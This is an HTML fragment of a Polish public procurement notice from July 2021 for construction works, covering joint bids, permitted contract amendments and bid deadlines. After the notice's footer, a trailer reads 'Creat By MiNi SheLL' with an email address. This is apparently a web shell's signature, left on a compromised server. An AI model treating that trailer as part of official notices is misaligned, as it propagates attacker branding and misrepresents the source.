mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z<br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają<br/>poszczególni wykonawcy.4. Oświadczenia i dokumenty potwierdzające brak podstaw do<br/>wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 Pzp. 1. Zamawiający, poza możliwością zmiany<br/>zawartej umowy na podstawie art. 455 uPzp, przewiduje możliwość zmian postanowień zawartej<br/>umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, poprzez<br/>przedłużenie terminu zakończenia robót co najmniej o okres odpowiadający wstrzymaniu lub<br/>opóźnieniu robót w przypadku: 1) wystąpienia konieczności udzielenia Wykonawcy zamówień<br/>dodatkowych, nieobjętych zamówieniem podstawowym, które wstrzymują lub opóźniają<br/>realizację przedmiotu umowy. 2) wystąpienia konieczności wykonania robót dodatkowych /w tym<br/>istotne wady dokumentacji/, zamiennych /w tym istotne wady dokumentacji/ lub zaniechanych /w<br/>tym, gdy wykonanie niektórych robót okazało się zbędne/, które wstrzymują lub opóźniają<br/>realizację przedmiotu umowy. 3) wystąpienia istotnych wad dokumentacji projektowej<br/>skutkujących koniecznością dokonania zmian w dokumentacji projektowej, jeżeli uniemożliwia to<br/>lub wstrzymuje realizację określonego rodzaju robót mających wpływ na termin wykonania robót.<br/>4) wystąpienia niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych<br/>uniemożliwiających prawidłowe wykonanie robót, w szczególności z powodu technologii<br/>realizacji prac określonych umową, normami lub innymi przepisami, wymagającej konkretnych<br/>warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest<br/>następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność.2. Zamawiający, poza<br/>możliwością zmiany zawartej umowy na podstawie art. 455 uPzp, przewiduje możliwość zmian<br/>postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy, poprzez zmianę sposobu wykonania przedmiotu umowy, zmianę wynagrodzenia<br/>Wykonawcy lub poprzez przedłużenie terminu zakończenia robót w przypadku:1) zmian<br/>technologicznych korzystnych dla Zamawiającego spowodowanych w szczególności:<br/>pojawieniem się na rynku materiałów lub urządzeń nowszej generacji lub nowszej technologii<br/>wykonania robót umożliwiających uzyskanie lepszej jakości robót.2) konieczności zrealizowania<br/>jakiejkolwiek części robót, objętych przedmiotem umowy, przy zastosowaniu odmiennych<br/>rozwiązań technicznych lub technologicznych, niż wskazane w dokumentacji projektowej, a<br/>wynikających ze stwierdzonych wad tej dokumentacji.3) wystąpienia odbiegających w sposób<br/>istotny od przyjętych w dokumentacji projektowej warunków geologicznych, geotechnicznych lub<br/>hydrologicznych, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub<br/>nienależytym wykonaniem przedmiotu umowy.4) wystąpienia odbiegających w sposób istotny od<br/>przyjętych w dokumentacji projektowej warunków terenu budowy, w szczególności napotkania<br/>nie zinwentaryzowanych lub błędnie zinwentaryzowanych znalezisk archeologicznych, sieci,<br/>instalacji lub innych obiektów budowlanych.5) konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych.6)<br/>wystąpienia konieczności wykonania robót dodatkowych, zamiennych lub zaniechanych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-26 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego na miniPortalu do dnia 26.07.2021 r. do godz. 09:00. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-26 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-12 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com